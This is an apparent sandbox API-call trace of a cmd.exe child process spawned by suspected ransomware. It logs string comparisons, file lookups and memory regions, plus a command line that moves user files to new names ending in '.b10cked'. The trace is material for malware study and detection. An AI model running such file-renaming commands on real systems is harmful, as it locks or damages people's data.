[0234.782] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.782] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.782] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.782] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.782] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.782] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.782] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.782] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.782] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.783] GetDriveTypeW (lpRootPathName="C:\\") returned 
0x3 [0234.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f1d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f1cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f1cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.785] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2=".") returned 63 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2="..") returned 63 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqis~1.ots")) returned 0x20 [0234.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.785] SetErrorMode (uMode=0x0) returned 0x0 [0234.785] SetErrorMode (uMode=0x1) returned 0x0 [0234.785] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", nBufferLength=0x104, lpBuffer=0x16eb5c, lpFilePart=0x16eb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", lpFilePart=0x16eb44*="MXJQIS~1.OTS") returned 0x2d [0234.785] SetErrorMode (uMode=0x0) returned 0x1 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2=".") returned 63 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2="..") returned 63 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqis~1.ots")) returned 0x20 [0234.786] SetErrorMode (uMode=0x0) returned 0x0 [0234.786] SetErrorMode (uMode=0x1) returned 0x0 [0234.786] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", nBufferLength=0x104, lpBuffer=0x16efd8, lpFilePart=0x16ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", lpFilePart=0x16ed70*="MXJQIS~1.OTS") returned 0x2d [0234.786] SetErrorMode (uMode=0x0) returned 0x1 [0234.786] SetErrorMode (uMode=0x0) returned 0x0 [0234.786] SetErrorMode (uMode=0x1) returned 0x0 [0234.786] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16f1e0, lpFilePart=0x16ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", lpFilePart=0x16ed70*="mXjqIsUDXYxFeYxzgw.ots.b10cked") returned 0x3f [0234.786] SetErrorMode (uMode=0x0) returned 0x1 [0234.786] SetLastError (dwErrCode=0x0) [0234.786] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots.b10cked")) returned 0xffffffff [0234.786] GetLastError () returned 0x2 [0234.786] FindFirstFileExW 
(in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x16e6ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e6ec) returned 0x260ed0 [0234.786] FindNextFileW (in: hFindFile=0x260ed0, lpFindFileData=0x16e6ec | out: lpFindFileData=0x16e6ec) returned 0 [0234.787] GetLastError () returned 0x12 [0234.787] FindClose (in: hFindFile=0x260ed0 | out: hFindFile=0x260ed0) returned 1 [0234.787] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x271c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271c20) returned 0x260ed0 [0234.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", lpFilePart=0x0) returned 0x3f [0234.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", nBufferLength=0x104, lpBuffer=0x16e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", lpFilePart=0x0) returned 0x37 [0234.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots")) returned 0x20 [0234.788] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots.b10cked"), dwFlags=0x3) returned 1 [0234.788] FindClose (in: hFindFile=0x260ed0 | out: hFindFile=0x260ed0) returned 1 [0234.788] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, 
_Format="%9d", _ArgList=0x16e938 | out: _Buffer=" 1") returned 9 [0234.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.788] GetFileType (hFile=0x7) returned 0x2 [0235.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e8c4 | out: lpMode=0x16e8c4) returned 1 [0235.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e8f8 | out: lpConsoleScreenBufferInfo=0x16e8f8) returned 1 [0235.351] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.352] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x16e938 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.352] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e91c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x16e91c*=0x1a) returned 1 [0235.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.352] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.352] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.352] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.352] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.353] SetConsoleInputExeNameW () returned 0x1 [0235.353] GetConsoleOutputCP () returned 0x1b5 [0235.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.353] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.353] exit (_Code=0) Process: id = "630" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" 
page_root = "0x7ea16c20" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35028 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35029 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35030 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35031 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35032 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35033 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35034 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" 
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35035 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35036 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 35037 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35186 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35187 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35188 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35189 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 35190 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 35191 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35192 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35193 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename 
= "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35194 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35195 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35196 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35197 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35198 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35199 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35200 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 35201 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35202 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35203 
start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35204 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35205 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35206 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35207 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 35208 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 35209 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 872 os_tid = 0xb2c [0234.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdb4 | out: lpSystemTimeAsFileTime=0x26fdb4*(dwLowDateTime=0xbf40f900, dwHighDateTime=0x1d440a9)) [0234.527] GetCurrentProcessId () returned 0xb08 [0234.527] GetCurrentThreadId () returned 0xb2c [0234.527] GetTickCount () returned 0x406a4 [0234.527] QueryPerformanceCounter (in: lpPerformanceCount=0x26fdac | out: lpPerformanceCount=0x26fdac*=29131644474) returned 1 [0234.528] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.528] __set_app_type (_Type=0x1) [0234.528] __p__fmode () returned 0x76b331f4 [0234.528] __p__commode () returned 0x76b331fc [0234.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.528] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 
[0234.528] GetCurrentThreadId () returned 0xb2c [0234.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb2c) returned 0x38 [0234.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.529] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.529] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd44 | out: phkResult=0x26fd44*=0x0) returned 0x2 [0234.529] VirtualQuery (in: lpAddress=0x26fd7b, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c 
[0234.529] GetConsoleOutputCP () returned 0x1b5 [0234.529] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.529] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.530] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.530] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.530] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.530] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.530] GetEnvironmentStringsW () returned 0x3a0198* [0234.530] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0234.530] GetEnvironmentStringsW () returned 0x3a0198* [0234.531] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0234.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecb4 | out: phkResult=0x26ecb4*=0x40) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0xc0, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | 
out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegCloseKey (hKey=0x40) returned 0x0 [0234.531] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecb4 | out: phkResult=0x26ecb4*=0x40) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, 